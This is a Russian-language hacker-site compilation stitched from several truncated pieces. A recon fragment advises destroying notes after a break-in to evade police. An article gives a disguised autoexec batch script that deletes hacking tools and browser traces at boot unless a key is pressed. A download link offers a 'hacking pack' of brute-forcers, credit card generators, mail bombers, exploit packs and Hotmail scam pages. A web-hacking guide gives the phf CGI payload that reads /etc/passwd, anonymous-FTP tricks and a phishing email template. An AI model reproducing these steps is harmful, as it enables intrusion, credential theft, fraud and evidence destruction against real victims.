WEB-сервер именует себя как IIS, но это предположение может тебя обмануть. Для окошек есть реализация сильнейшего сервера Apache. А так как взлом разных серверов производиться по разному, то тебя должно в первую очередь волновать, кто именно сидит на 80-м порту - IIS или Apache. Единственный недостаток Shadow Scan - именно при определении версии ОС некоторые релизы Shadow Scan вылетали в синий экран. Но в последней версии этот баг вроде исправлен. Адрес этой распрекрасной тулзы ты можешь найти во врезке "Download". Юзаем порты : Итак, теперь ты знаешь, какая на сервере установлена ОС, какие порты открыты, и какие именно серверы висят на этих портах. Вся эта инфа должна быть у тебя записана в удобном для восприятия виде, хоть в файле, хоть на бумаге. Не ленись всю собранную инфу записывать и собирать в одну кучу. Помни, что даже компьютерные мозги иногда дают сбои, а человеческие делают это регулярно. Самое интересное, что чаще всего забывается самое необходимое. Ну а после взлома не поленись уничтожить, иначе ты облегчишь работу нашей доблестной милиции. Все Читать далее...

Боишься сотрудников ФСБ?
Автор: bustards, Просмотров: 498
Если ты из тех, кому по ночам снятся сотрудники ФСБ, при виде милиционера ты начинаешь усиленно шифроваться или просто хочешь, чтоб твой винчестер без лишнего гимора был дотупен только тебе, эта статья как раз для тебя.
Представь такую ситуацию, ты сидишь перед телеком, смотришь Санта Барбару и тут раздаётся звонок. Ты открываешь дверь и в квартиру входят несколько амбалов, представившись сотрудниками ФСБ =)Они просят тебя включить компьютер. Ты включаешь. Полазив пару минут по твоему винчестеру, они находят и твой любимый Sub7 с ОбманиСоседа, и Voidozer, и кучу ворованных даил апов.
Затем заламывают тебе руку и везут в следственный изолятор. Как тебе? А ведь всё могло бы быть и подругому.
Конечно, самым надёжным способом являются крипто алгоритмы. Но за надёжность нужно платить гимором и разного рода неудобствами. В этой статье я расскажу тебе о простеньком самодельном защитном устройстве для твеого компа от посягательств посторонних людей.
Ладно, начнём.
Прежде всего все компроментирующие тебя данные ты должен хранить в одном каталоге (я рассматриваю именно такой случай). Возможно присутствие неограниченного числа подкаталогов в нём.Далее cкопируй свой autoexec.bat в файл autoexec.bak (тоже в корень диска С). Теперь открой autoexec.bat блокнотом и добавь в конец строчку:
load PCI Steering (PCIIRQHOLDER5)
Не пугайся, она такая чудная, чтоб все подумали, что она чисто системная. Далее посмотри, есть ли в твоём autoexec'e cтрочка вроди:
set PATH=список_папок
Вместо "список_папок" там должна быть прописана папка с твоей виндой и ещё пара. Если такого вообще не наблюдается, добавь строчку:
set PATH=%windir%command
Всё, мы приготовились к внедрению самого механизма. Теерь cоздай в каталоге "c:windowscommand" файл load.bat. Его содержание должно быть таким:
@echo off
echo --- By windows setup ---
@choice /c:za /N /T:a,5
@if errorlevel 2 goto its_ok
@deltree /y каталог_с_прогами_который_нужно_удалить
@cls
@deltree /y %windir%Tempor~1*.* > dead
@deltree /y %windir%Tempor~1dead
@cls
@deltree /y %windir%History*.* > dead
@deltree /y %windir%Historydead
@cls
@deltree /y %windir%Cookies*.txt > dead
@deltree /y %windir%Cookiesdead
@cls
@deltree /y %windir%TEMP*.* > dead
@deltree /y %windir%TEMPdead
@cls
@deltree /y c:autoexec.bat
@cls
@ren c:autoexec.bak autoexec.bat
@deltree /y %windir%commandload.bat
:its_ok
Всё. Теперь перегружай комп и наслаждайся.
Фишка вся в том, что при загрузке компа, как только ты увидишь на экране надпись "--- By windows setup ---" ты должен будешь нажать на кнопку "z". Если в течение пяти секунд ты на неё не нажмёшь, сотрётся каталог с твоими прогами и почистятся папки с временными инет файлами (типа логов). Как тебе? =) Тоесть ты один знаешь, как избежать этого дестроя. И самое главное, что сам дестрой будет проходить совершенно незаметно и по завершению оного данный механизм самоуничтожется. Тоесть никто и не узнает, что вообще что-то на твоём компе было (подредактированный autoexec.bat тоже заменяется на старый).
Если тебя ломает при каждой загрузке нажимать на Z, можешь сделать так, чтобы наоборот при нажатии на кнопку происходил дестрой. Тоесть у тебя будет 5 сек, чтобы нажать на кнопку "А" (именно А, а не Z) для уничтожения компромата. Для этого замени 4ую строчку на "@choice /c:za /N /T:z,5
"
Если для тебя 5 сек это маломного, то просто подредактируй 3тью строчку cкрипта (замени там число 5 на более подходящее).

Пакет инструментов для взома

В пакете также имеются программы описания к каторым здесь нет.

Cкачать пакет http://rapidshare.com/files/119660101/ULTRA_HACKERS.rar
зеркало:
http://depositfiles.com/files/5867587
56.52 MB
Описания:

AddrView
Описание: AddrView дает вам возможность анализировать HTML страницы и извлекать большинство адресов URL, находящихся в них. AddrView извлекает URL изображений (img - тег), ссылки на другие файлы (a - тег), CSS файлы, фреймы, Flash файлы и другие. Вы можете сохранять извлеченные списки адресов в текстовые файлы, HTML или XML файлы, или добавлять эти адреса в Избанное.

AnonFTP
Описание: This package contains /var/ftp area for anonymous FTP access.

AppToService
Описание: Программа дает возможность из командной строки запускать обычные приложения как сервис (службу).
Впрочем, установить любое приложение в качестве сервиса можно совершенно бесплатно - достаточно всего лишь воспользоваться рекомендациями Windows XP FAQ.

arpinject
Описание:Любой компьютер в сети может просто взять, и послать пакет ARP_REPLAY. И тем самым внести изменения в ARP таблицу. Такая атака, носит название ARP Poisonig. Ее результат - перенаправление трафика, к требуемому хосту. Послать такой пакет(ы) можно программно, используя утилиту ARPInject.

aspack21
Описание:Очень неплохой упаковщик *.exe и *.dll файлов (в некоторых случаях степень сжатия достигает 70%). Кроме этого, программа хороша (особенно для программистов, пытающихся защитить свои шаровары) сложностью распаковки упакованного файла. Насколько я понимаю, сам ASPack упакован ASPACK'ом же :-) Неплохо и то, что программа дает возможность проверить перед окончательной упаковкой работу "предупакованного" exe-файла и, при нарушении его нормальной работы, отменить сжатие.
В новой версии улучшилась скорость упаковки и добавлена опция "максимальная компрессия". В незарегистрированном виде программа работает 30 дней. Интерфейс многоязычный, в том числе и на русском языке.

bios_pass_remover
Описание: удаление пароля БИОС

brutus
Описание:Брутфорсер хз чего

Cable Modem Sniffer
Описание:Перехватчик трафика кабельного модема

CapKeys_DIGITAL
Описание:Key update einfach per internet.
abspeichern als SofCam.key und als textdatei moglich.

CGI Founder v1.043
Описание:Прога для поиска дыр в CGI скриптах.

CGISscan
Описание:Сканер CGI скриптов

cports
Описание:Просмотр подключений и слушающих портов на компьютере

craagle
Описание:Программа для автоматизированного поиска всяческих серийнков и кейгенов по многим соответствующим архивам.

CreditCardGjenerator
Описание:Генератор кредов

DDL Sites
Описаниеirect Download Links

DeepUnFreez
Описание:"делает вычислительные окружающие среды легче управлять и обслуживать. Каждое переначало уничтожает все замены и перезагружает компьютер к его первоначальному состоянию, право вниз на последний байт"

E-mail Cracker
Описание:Восстановите забытые пароли почтового ящика, которые сохранены в клиенте электронной почты. Программа подражает серверу POP3, и пароль посылают назад пользователю. Это поддерживает клиента любой электронной почты POP3.

ezDataBase_Defacer
Описание:Дефэйсер движка ezDataBase

FTP Brute Forcer
Описание:Брутфорсер ФТП

ftpbr
Описание:Брутфорсер ФТП

~Censored~ Mail Bomber 2.3
Описание:Бомер мыла

G00B3RS_phpBB_exploit_pack
Описание:Пак эксплоитов на двиг phpBB

Google_Hacker_1.2
Описание:Утилита помогающая с запросами из серии гуглхак

grinder1.1
Описание:Программа поможет найти указаный файл в заданом диапазоне IP-адрессов.

HackersAssistant
Описание:Пакет программ для хакера: Port Scanner, Ping Flooder,Server Slower,Connections,File Cleaner,Get Passwords,IP Validator,Web Browser,Ip Information,HTML Stealer,Site IP Retrieval,Winsock Scanner,exe Corruptor,Nuker,Hit Increaser,File Generator,Anonymous e-mail,Whois,Binary

HackTheGame
Описание: HackTheGame это игра-симулятор жизни хакера. В которой вы выступаете в роли хакера. Которому хз для чего и как надо ломать системы. Вступать в разборки с хак порталами, в общем, прожить долгую и весёлую жизнь. Главное не попасться бы мусорам.

Hotmail Email Hacker
Hotmail HAcker Gold
Hotmail ScamPage
HotmailHack
Описание:По моему все равно какая то ересь давно не работающая, хотмыло не так просто взломать

hydra-4.6-win
Описание:THC-Hydra - распараллеленый взломщик паролей к различным сервисам (FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO и др.) для UNIX платформ. С помощью этой утилиты вы можете атаковать несколько сервисов одновременно.

iecv
Описание:Internet Explorer Cookies View

ipnetinfo
Описание:Программа, которая показывает информацию об IP адресе. Она позволяет показывать расширенную информацию, касающуюся страны, владельца домена, диапазона выделяемых IP адресов, контактную информацию и многое другое. Эта утилита будет полезна, например, когда необходимо узнать происхождение почты, полученной от неизвестного Читать далее...

1. Получение информации
Перед тем, как хакнуть Web-страничку, тебе следует иметь кое-какую информацию. Как получить ее? Сходи на http://www.Internic.com. Скажи им, что ты хочешь создать Web-страничку. Напиши имя той странички, которую ты хочешь хакнуть, в графе, где просит ввести имя странички, которую ты хочешь создать. Оно скажет, что типа, извините, кто-то уже использует этот домен и выдает информацию об этом. Это имя, адрес и E-Mail. Теперь ты знаешь, с кем будешь работать.


2. Методы взлома. Есть несколько видов взлома.


A) Взлом через FTP. Если ты в Windows зайди в эмуляцию DOS (Сделай это, когда законектишся на твой ISP) Теперь напиши в открытом Chepuha.com (Chepuha.com = введи место, которое ты хочешь хакнуть)
После этого тебя спросят логин, нажми Enter
После этого тебя спросят пароль, нажми Enter
Потом напиши: quote user ftp
Напиши: quote cwd ~root и надми Enter
Напиши: quote pass ftp
Теперь ты в системе, напиши: cd etc и нажми Enter
Напиши: get passwd и если это не сработает, напиши get passwd.


Б) Получить файл с паролями, это гораздо легче. Через TelNet на анонимных FTP серверах, посмотри директорию и найди файл, который называется Passwd. Затем используй Cracker Jack и расшифруй все пароли. Другой путь, получить пароли с помощью твоего браузера. Напиши: cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd после имени сервера. Например, имя может быть www.hackme.com, вот и напиши: http://www.hackme.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Не уверен, что это сработает, но 10 сайтов из 100 будет работать это точно.


В) Этот метод взлома использует GBoZ. Он называется "Scoial Engeneering", что это имеется в виду, долго рассказывать :). И так, ты получаешь информацию с Internic (пункт 1). Получив пользовательский E-Mail, запусти анонимную почтовую программу и IP снифер. В аноним-проге введи почтовый адрес жертвы и пошли ему его страничку, которую ты собираешься хакнуть. Тебе следует с имитировать письмо, как InternicHost.net. Скажи жертве в письме, типа такое: "Your webpage is casuing severe errors in our server change your password to "WXZPP3" immidately thanks". СОБЛЮДАЙ ГРАММАТИКУ И ПУНКТУАЦИЮ, ЧТОБЫ ПИСЬМО ВЫГЛЯДЕЛО, КАК ОФИЦИАЛЬНОЕ!


Г) Если ты запустишь Linux или Unix, просто пропингуй выход Hackme.com (Hackme.com = место, которое ты хочешь хакнуть!)


Ok, это все долго и нудно, но я надеюсь, что это придаст желаемых результатов!